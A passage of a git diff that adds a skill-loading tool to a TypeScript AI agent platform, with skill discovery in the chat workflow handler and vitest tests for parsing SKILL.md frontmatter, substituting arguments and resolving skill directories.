+ *   - skill (load a project-level skill's SKILL.md; only registered when the
+ *     sandbox has skills available, so models without any skill catalog
+ *     don't see the tool at all and never call it speculatively)
  *
- * Composite tools (`task` subagent, `ask_user_question` UI part,
- * `skill` skill discovery) port in a follow-up PR — they require
- * subagent context plumbing / UI rendering / skill discovery infra
- * that isn't in api today.
+ * @param options.skills - Discovered skill catalog. When empty / undefined,
+ *   `skill` is omitted from the tool record so the model doesn't see it.
  */
-export function buildAgentTools() {
+export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) {
+  const hasSkills = (options.skills?.length ?? 0) > 0;
   return {
     bash: bashTool,
     read: readFileTool,
@@ -33,6 +36,7 @@ export function buildAgentTools() {
     glob: globTool,
     todo_write: todoWriteTool,
     web_fetch: webFetchTool,
+    ...(hasSkills ? { skill: skillTool } : {}),
   };
 }
 
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
index 63d2a1b7e..acb455164 100644
--- a/lib/agent/tools/AgentContext.ts
+++ b/lib/agent/tools/AgentContext.ts
@@ -1,4 +1,5 @@
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Per-tool-call context threaded into the agent via `streamText`'s
@@ -31,4 +32,14 @@ export type AgentContext = {
    * Public information — no security risk in exposing.
    */
   recoupOrgId?: string;
+  /**
+   * Skills discovered in the sandbox before workflow start (handler
+   * calls `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`).
+   * The `skillTool` reads this list to:
+   *   - resolve names → SKILL.md paths
+   *   - filter out skills with `disable-model-invocation`
+   *   - surface "Available skills" hints when a model picks an unknown name
+   * Empty / undefined when the sandbox has no `skills/` directory.
+   */
+  skills?: SkillMetadata[];
 };
diff --git a/lib/agent/tools/__tests__/skillTool.test.ts b/lib/agent/tools/__tests__/skillTool.test.ts
new file mode 100644
index 000000000..0b3196dbc
--- /dev/null
+++ b/lib/agent/tools/__tests__/skillTool.test.ts
@@ -0,0 +1,169 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { skillTool } from "@/lib/agent/tools/skillTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const baseCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+function makeSandbox(readFile: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", readFile };
+}
+
+function skillMd(body: string) {
+  return `---\nname: commit\ndescription: Make a commit\n---\n\n${body}`;
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("skillTool", () => {
+  it("returns success:false with available skills when the requested skill isn't in context", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "unknown" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "Make a commit",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+          {
+            name: "deploy",
+            description: "Deploy",
+            path: "/sandbox/mono/skills/deploy",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: commit, deploy/);
+  });
+
+  it("returns success:false when no skills are loaded", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: { ...baseCtx, skills: [] },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/Available skills: none/);
+  });
+
+  it("matches the skill name case-insensitively (slash-command behavior)", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("body content")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!(
+      { skill: "COMMIT" }, // model typed it loud
+      {
+        experimental_context: {
+          ...baseCtx,
+          skills: [
+            {
+              name: "commit",
+              description: "x",
+              path: "/sandbox/mono/skills/commit",
+              filename: "SKILL.md",
+              options: {},
+            },
+          ],
+        },
+      } as never,
+    )) as { success: boolean; skillName: string };
+    expect(result.success).toBe(true);
+    expect(result.skillName).toBe("COMMIT");
+  });
+
+  it("returns the SKILL.md body with skill directory injected", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd("Run git commit -m ...")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; content: string; skillPath: string };
+    expect(result.success).toBe(true);
+    expect(result.skillPath).toBe("/sandbox/mono/skills/commit");
+    expect(result.content).toContain("Skill directory: /sandbox/mono/skills/commit");
+    expect(result.content).toContain("Run git commit -m ...");
+    expect(sb.readFile).toHaveBeenCalledWith("/sandbox/mono/skills/commit/SKILL.md", "utf-8");
+  });
+
+  it("substitutes $ARGUMENTS in the skill body when args are provided", async () => {
+    const sb = makeSandbox(vi.fn().mockResolvedValue(skillMd('git commit -m "$ARGUMENTS"')));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit", args: "fix bug" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { content: string };
+    expect(result.content).toContain('git commit -m "fix bug"');
+    expect(result.content).not.toContain("$ARGUMENTS");
+  });
+
+  it("rejects skills with disable-model-invocation set", async () => {
+    vi.mocked(connectVercel).mockResolvedValue(makeSandbox(vi.fn()) as never);
+    const result = (await skillTool.execute!({ skill: "internal" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "internal",
+            description: "x",
+            path: "/sandbox/mono/skills/internal",
+            filename: "SKILL.md",
+            options: { disableModelInvocation: true },
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/cannot be invoked/);
+  });
+
+  it("returns success:false when the SKILL.md read fails", async () => {
+    const sb = makeSandbox(vi.fn().mockRejectedValue(new Error("ENOENT")));
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const result = (await skillTool.execute!({ skill: "commit" }, {
+      experimental_context: {
+        ...baseCtx,
+        skills: [
+          {
+            name: "commit",
+            description: "x",
+            path: "/sandbox/mono/skills/commit",
+            filename: "SKILL.md",
+            options: {},
+          },
+        ],
+      },
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/ENOENT/);
+  });
+});
diff --git a/lib/agent/tools/skillTool.ts b/lib/agent/tools/skillTool.ts
new file mode 100644
index 000000000..8c74f35d1
--- /dev/null
+++ b/lib/agent/tools/skillTool.ts
@@ -0,0 +1,87 @@
+import * as path from "path";
+import { tool } from "ai";
+import { z } from "zod";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+import { getSkills } from "@/lib/skills/getSkills";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+const skillInputSchema = z.object({
+  skill: z.string().describe("The skill name to invoke"),
+  args: z.string().optional().describe("Optional arguments for the skill"),
+});
+
+/**
+ * `skill` — load a project-level skill's SKILL.md body and return it
+ * to the model. The model then follows the loaded instructions in
+ * subsequent turns (using `bash`, `read`, `write`, etc. to actually
+ * carry them out). The skill catalog itself is discovered in the
+ * handler before workflow start and threaded via `AgentContext.skills`.
+ *
+ * Matching is case-insensitive so the model can resolve a slash command
+ * like `/Commit` against a skill named `commit`. Skills marked with
+ * `disable-model-invocation` in their frontmatter are filtered out at
+ * the gate — only the user (via a server-side dispatcher) can run them.
+ */
+export const skillTool = tool({
+  description: `Execute a skill within the main conversation.
+
+When users ask you to perform tasks, check if any of the available skills can help complete the task more effectively. Skills provide specialized capabilities and domain knowledge.
+
+When users ask you to run a "slash command" or reference "/<something>" (e.g., "/commit", "/review-pr"), they are referring to a skill. Use this tool to invoke the corresponding skill.
+
+How to invoke:
+- Use this tool with the skill name and optional arguments
+- Examples:
+  - skill: "pdf" — invoke the pdf skill
+  - skill: "commit", args: "-m 'Fix bug'" — invoke with arguments
+
+Important:
+- When a skill is relevant, invoke this tool IMMEDIATELY as your first action
+- When the user's message starts with "/<name>", they are invoking a skill — call this tool FIRST before any other tool
+- NEVER just announce or mention a skill without actually calling this tool
+- Only use skills listed in "Available skills" in your system prompt`,
+  inputSchema: skillInputSchema,
+  execute: async ({ skill, args }, { experimental_context }) => {
+    const sandbox = await getSandbox(experimental_context, "skill");
+    const skills = getSkills(experimental_context);
+
+    const normalized = skill.toLowerCase();
+    const found = skills.find(s => s.name.toLowerCase() === normalized);
+    if (!found) {
+      const available = skills.map(s => s.name).join(", ");
+      return {
+        success: false,
+        error: `Skill '${skill}' not found. Available skills: ${available || "none"}`,
+      };
+    }
+
+    if (found.options.disableModelInvocation) {
+      return {
+        success: false,
+        error: `Skill '${skill}' cannot be invoked by the model (disable-model-invocation is set)`,
+      };
+    }
+
+    const skillFilePath = path.join(found.path, found.filename);
+    let fileContent: string;
+    try {
+      fileContent = await sandbox.readFile(skillFilePath, "utf-8");
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to read skill file: ${message}` };
+    }
+
+    const body = extractSkillBody(fileContent);
+    const bodyWithDir = injectSkillDirectory(body, found.path);
+    const content = substituteArguments(bodyWithDir, args);
+
+    return {
+      success: true,
+      skillName: skill,
+      skillPath: found.path,
+      content,
+    };
+  },
+});
diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
index fb3b434f1..702edb918 100644
--- a/lib/chat/__tests__/handleChatWorkflowStream.test.ts
+++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts
@@ -39,6 +39,19 @@ vi.mock("@/lib/networking/getCorsHeaders", () => ({
 }));
 vi.mock("@/lib/uuid/generateUUID", () => ({ default: vi.fn(() => "deterministic-uuid") }));
 
+// Stub sandbox connection + skill discovery so handler tests don't actually
+// try to talk to Vercel Sandbox / parse SKILL.md files. The handler treats
+// discovery failures as non-fatal (empty catalog), but we mock to keep tests fast.
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(async () => ({ workingDirectory: "/sandbox/mono" })),
+}));
+vi.mock("@/lib/skills/discoverSkills", () => ({
+  discoverSkills: vi.fn(async () => []),
+}));
+vi.mock("@/lib/skills/getSandboxSkillDirectories", () => ({
+  getSandboxSkillDirectories: vi.fn(() => ["/sandbox/mono/skills"]),
+}));
+
 const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa";
 const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb";
 const SESSION_ID = "22222222-2222-2222-2222-222222222222";
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index 6ceb0c867..818c70f8c 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -15,7 +15,10 @@ import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
 import { extractOrgId } from "@/lib/recoupable/extractOrgId";
 import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
 import type { VercelState } from "@/lib/sandbox/vercel/state";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -90,6 +93,23 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   const recoupOrgId = session.clone_url
     ? (extractOrgId(session.clone_url) ?? undefined)
     : undefined;
+
+  // Connect the sandbox up-front so we can discover project-level skills
+  // before starting the workflow. The connected handle isn't passed into
+  // the workflow (it's not durably serializable) — only `sandbox.state`
+  // is. Tools reconnect via `connectVercel(state)` inside `"use step"`.
+  let skills: Awaited<ReturnType<typeof discoverSkills>> = [];
+  try {
+    const sandbox = await connectVercel(session.sandbox_state as VercelState);
+    const dirs = await getSandboxSkillDirectories(sandbox);
+    skills = await discoverSkills(sandbox, dirs);
+  } catch (error) {
+    console.error(
+      "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:",
+      error,
+    );
+  }
+
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
@@ -105,6 +125,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
           workingDirectory: DEFAULT_WORKING_DIRECTORY,
         },
         recoupOrgId,
+        skills,
         // No `recoupAccessToken`: handing the long-lived api key to bash
         // would let any model-issued command exfiltrate it via env. Proper
         // short-lived token minting lands alongside the `skill` tool port
diff --git a/lib/skills/__tests__/discoverSkills.test.ts b/lib/skills/__tests__/discoverSkills.test.ts
new file mode 100644
index 000000000..a252ba0b8
--- /dev/null
+++ b/lib/skills/__tests__/discoverSkills.test.ts
@@ -0,0 +1,158 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { discoverSkills } from "@/lib/skills/discoverSkills";
+
+function makeStat(isDir: boolean) {
+  return { isDirectory: () => isDir, isFile: () => !isDir, size: 0, mtimeMs: 0 };
+}
+
+function makeDirent(name: string, isDir: boolean) {
+  return {
+    name,
+    isDirectory: () => isDir,
+    isFile: () => !isDir,
+    isSymbolicLink: () => false,
+    isBlockDevice: () => false,
+    isCharacterDevice: () => false,
+    isFIFO: () => false,
+    isSocket: () => false,
+  };
+}
+
+function frontmatter(name: string, description: string, extra = "") {
+  return `---\nname: ${name}\ndescription: ${description}\n${extra}---\n\nBody for ${name}`;
+}
+
+function makeSandbox() {
+  const files = new Map<string, string>();
+  return {
+    files,
+    workingDirectory: "/sandbox/mono",
+    stat: vi.fn(async (path: string) => {
+      if (path.endsWith("/skills")) return makeStat(true);
+      if (path.startsWith("/sandbox/mono/skills/") && !path.endsWith(".md")) return makeStat(true);
+      throw new Error(`ENOENT: ${path}`);
+    }),
+    readdir: vi.fn(),
+    access: vi.fn(async (path: string) => {
+      if (!files.has(path)) throw new Error(`ENOENT: ${path}`);
+    }),
+    readFile: vi.fn(async (path: string) => {
+      const content = files.get(path);
+      if (content === undefined) throw new Error(`ENOENT: ${path}`);
+      return content;
+    }),
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("discoverSkills", () => {
+  it("discovers a single skill with name + description + path", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("commit", true)]);
+    sb.files.set("/sandbox/mono/skills/commit/SKILL.md", frontmatter("commit", "Make a commit"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]).toMatchObject({
+      name: "commit",
+      description: "Make a commit",
+      path: "/sandbox/mono/skills/commit",
+      filename: "SKILL.md",
+    });
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("lowercase", true)]);
+    sb.files.set("/sandbox/mono/skills/lowercase/skill.md", frontmatter("lowercase", "lc"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.filename).toBe("skill.md");
+  });
+
+  it("returns [] when the directory does not exist", async () => {
+    const sb = makeSandbox();
+    sb.stat.mockRejectedValue(new Error("ENOENT"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toEqual([]);
+  });
+
+  it("skips entries that aren't directories", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("README.md", false), makeDirent("good", true)]);
+    sb.files.set("/sandbox/mono/skills/good/SKILL.md", frontmatter("good", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("good");
+  });
+
+  it("skips subdirs without SKILL.md / skill.md", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("empty", true), makeDirent("real", true)]);
+    sb.files.set("/sandbox/mono/skills/real/SKILL.md", frontmatter("real", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("real");
+  });
+
+  it("skips skills with invalid frontmatter (missing required fields)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("broken", true), makeDirent("ok", true)]);
+    sb.files.set("/sandbox/mono/skills/broken/SKILL.md", "---\nname: broken\n---\nno desc");
+    sb.files.set("/sandbox/mono/skills/ok/SKILL.md", frontmatter("ok", "yes"));
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.name).toBe("ok");
+  });
+
+  it("skips skills whose names shadow built-in commands (model / resume / new)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([
+      makeDirent("model", true),
+      makeDirent("resume", true),
+      makeDirent("new", true),
+      makeDirent("kept", true),
+    ]);
+    for (const name of ["model", "resume", "new", "kept"]) {
+      sb.files.set(`/sandbox/mono/skills/${name}/SKILL.md`, frontmatter(name, "x"));
+    }
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills.map(s => s.name)).toEqual(["kept"]);
+  });
+
+  it("dedupes by name across multiple directories (first wins, case-insensitive)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockImplementation(async (dir: string) => {
+      if (dir === "/sandbox/mono/skills") return [makeDirent("Foo", true)] as never;
+      if (dir === "/global/.skills") return [makeDirent("foo", true)] as never;
+      return [];
+    });
+    sb.files.set("/sandbox/mono/skills/Foo/SKILL.md", frontmatter("Foo", "project"));
+    sb.files.set("/global/.skills/foo/SKILL.md", frontmatter("foo", "global"));
+    sb.stat.mockImplementation(async (p: string) => {
+      if (p === "/sandbox/mono/skills" || p === "/global/.skills") return makeStat(true);
+      throw new Error("ENOENT");
+    });
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills", "/global/.skills"]);
+    expect(skills).toHaveLength(1);
+    expect(skills[0]?.description).toBe("project"); // first dir wins
+  });
+
+  it("populates options from frontmatter (camelCase + split lists)", async () => {
+    const sb = makeSandbox();
+    sb.readdir.mockResolvedValue([makeDirent("scoped", true)]);
+    sb.files.set(
+      "/sandbox/mono/skills/scoped/SKILL.md",
+      frontmatter(
+        "scoped",
+        "limited",
+        "allowed-tools: bash, read\ndisable-model-invocation: true\n",
+      ),
+    );
+    const skills = await discoverSkills(sb as never, ["/sandbox/mono/skills"]);
+    expect(skills[0]?.options).toEqual({
+      disableModelInvocation: true,
+      allowedTools: ["bash", "read"],
+    });
+  });
+});
diff --git a/lib/skills/__tests__/extractSkillBody.test.ts b/lib/skills/__tests__/extractSkillBody.test.ts
new file mode 100644
index 000000000..b8f62bbc8
--- /dev/null
+++ b/lib/skills/__tests__/extractSkillBody.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { extractSkillBody } from "@/lib/skills/extractSkillBody";
+
+describe("extractSkillBody", () => {
+  it("strips YAML frontmatter and returns the body", () => {
+    const md = "---\nname: foo\ndescription: bar\n---\n# Heading\n\nBody.";
+    expect(extractSkillBody(md)).toBe("# Heading\n\nBody.");
+  });
+
+  it("returns the full content when no frontmatter is present", () => {
+    expect(extractSkillBody("# Just a heading")).toBe("# Just a heading");
+  });
+
+  it("trims surrounding whitespace", () => {
+    expect(extractSkillBody("---\nname: x\ndescription: y\n---\n\n\nbody\n\n")).toBe("body");
+  });
+
+  it("tolerates Windows-style CRLF line endings", () => {
+    const md = "---\r\nname: foo\r\ndescription: bar\r\n---\r\nbody";
+    expect(extractSkillBody(md)).toBe("body");
+  });
+});
diff --git a/lib/skills/__tests__/findSkillFile.test.ts b/lib/skills/__tests__/findSkillFile.test.ts
new file mode 100644
index 000000000..2d15de6fa
--- /dev/null
+++ b/lib/skills/__tests__/findSkillFile.test.ts
@@ -0,0 +1,34 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
+
+beforeEach(() => vi.clearAllMocks());
+
+function makeSandbox(existing: string[]) {
+  const set = new Set(existing);
+  return {
+    access: vi.fn(async (p: string) => {
+      if (!set.has(p)) throw new Error(`ENOENT: ${p}`);
+    }),
+  };
+}
+
+describe("findSkillFile", () => {
+  it("prefers uppercase SKILL.md when both casings exist", async () => {
+    const sb = makeSandbox(["/skills/foo/SKILL.md", "/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/SKILL.md");
+    expect(sb.access).toHaveBeenCalledWith("/skills/foo/SKILL.md");
+  });
+
+  it("falls back to lowercase skill.md when SKILL.md is missing", async () => {
+    const sb = makeSandbox(["/skills/foo/skill.md"]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBe("/skills/foo/skill.md");
+  });
+
+  it("returns null when neither casing exists", async () => {
+    const sb = makeSandbox([]);
+    const result = await findSkillFile(sb as never, "/skills/foo");
+    expect(result).toBeNull();
+  });
+});
diff --git a/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
new file mode 100644
index 000000000..7833f2450
--- /dev/null
+++ b/lib/skills/__tests__/getGlobalSkillsDirectory.test.ts
@@ -0,0 +1,15 @@
+import { describe, it, expect } from "vitest";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+describe("getGlobalSkillsDirectory", () => {
+  it("returns <home>/.agents/skills", () => {
+    expect(getGlobalSkillsDirectory("/root")).toBe("/root/.agents/skills");
+    expect(getGlobalSkillsDirectory("/home/vercel-sandbox")).toBe(
+      "/home/vercel-sandbox/.agents/skills",
+    );
+  });
+
+  it("handles trailing slash on input", () => {
+    expect(getGlobalSkillsDirectory("/root/")).toBe("/root/.agents/skills");
+  });
+});
diff --git a/lib/skills/__tests__/getSandboxSkillDirectories.test.ts b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
new file mode 100644
index 000000000..5762ccea1
--- /dev/null
+++ b/lib/skills/__tests__/getSandboxSkillDirectories.test.ts
@@ -0,0 +1,23 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+
+vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({
+  resolveSandboxHomeDirectory: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandboxSkillDirectories", () => {
+  it("returns just the global skill dir under the resolved $HOME", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never);
+    expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]);
+  });
+
+  it("works with the /root fallback (open-agents base image)", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never);
+    expect(dirs).toEqual(["/root/.agents/skills"]);
+  });
+});
diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts
new file mode 100644
index 000000000..8ffd47e24
--- /dev/null
+++ b/lib/skills/__tests__/getSkills.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { getSkills } from "@/lib/skills/getSkills";
+
+const validCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+const sample = {
+  name: "recoup-api",
+  description: "Recoupable API skill",
+  path: "/home/vercel-sandbox/.agents/skills/recoup-api",
+  filename: "SKILL.md",
+  options: {},
+};
+
+describe("getSkills", () => {
+  it("returns the skills array when present in a valid AgentContext", () => {
+    expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]);
+  });
+
+  it("returns [] when no skills field is set", () => {
+    expect(getSkills(validCtx)).toEqual([]);
+  });
+
+  it("returns [] for malformed contexts (non-AgentContext shape)", () => {
+    expect(getSkills(undefined)).toEqual([]);
+    expect(getSkills(null)).toEqual([]);
+    expect(getSkills({ noSandbox: true })).toEqual([]);
+    expect(getSkills({ sandbox: null })).toEqual([]);
+  });
+});
diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts
new file mode 100644
index 000000000..ac6d646bb
--- /dev/null
+++ b/lib/skills/__tests__/injectSkillDirectory.test.ts
@@ -0,0 +1,14 @@
+import { describe, it, expect } from "vitest";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+
+describe("injectSkillDirectory", () => {
+  it("prepends a `Skill directory: <path>` header followed by a blank line", () => {
+    expect(injectSkillDirectory("body content", "/skills/foo")).toBe(
+      "Skill directory: /skills/foo\n\nbody content",
+    );
+  });
+
+  it("works with empty body", () => {
+    expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n");
+  });
+});
diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
new file mode 100644
index 000000000..91dfcf7c1
--- /dev/null
+++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
@@ -0,0 +1,56 @@
+import { describe, it, expect } from "vitest";
+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+
+describe("parseSkillFrontmatter", () => {
+  it("parses a minimal frontmatter (name + description)", () => {
+    const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.name).toBe("commit");
+    expect(result.data.description).toBe("Make a git commit");
+  });
+
+  it("unwraps double-quoted values (including escaped quotes)", () => {
+    const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe('Has "quotes" inside');
+  });
+
+  it("parses booleans for unquoted true/false", () => {
+    const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data["disable-model-invocation"]).toBe(true);
+    expect(result.data["user-invocable"]).toBe(false);
+  });
+
+  it("treats `true`/`false` inside quotes as strings (not booleans)", () => {
+    const md = `---\nname: foo\ndescription: "true"\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("true");
+  });
+
+  it("returns success:false when frontmatter is missing", () => {
+    const result = parseSkillFrontmatter("just markdown, no frontmatter");
+    expect(result.success).toBe(false);
+  });
+
+  it("returns success:false when required fields are absent", () => {
+    const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`);
+    expect(result.success).toBe(false);
+  });
+
+  it("preserves colons in values (e.g. URLs)", () => {
+    const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("see https://example.com");
+  });
+});
diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts
new file mode 100644
index 000000000..db4fb0aa9
--- /dev/null
+++ b/lib/skills/__tests__/substituteArguments.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+describe("substituteArguments", () => {
+  it("replaces $ARGUMENTS with the provided args", () => {
+    expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe(
+      "run with --flag value",
+    );
+  });
+
+  it("replaces all occurrences", () => {
+    expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x");
+  });
+
+  it("substitutes empty string when args are undefined", () => {
+    expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with ");
+  });
+
+  it("leaves text unchanged when $ARGUMENTS is absent", () => {
+    expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here");
+  });
+});
diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts
new file mode 100644
index 000000000..9ae0ced67
--- /dev/null
+++ b/lib/skills/discoverSkills.ts
@@ -0,0 +1,89 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
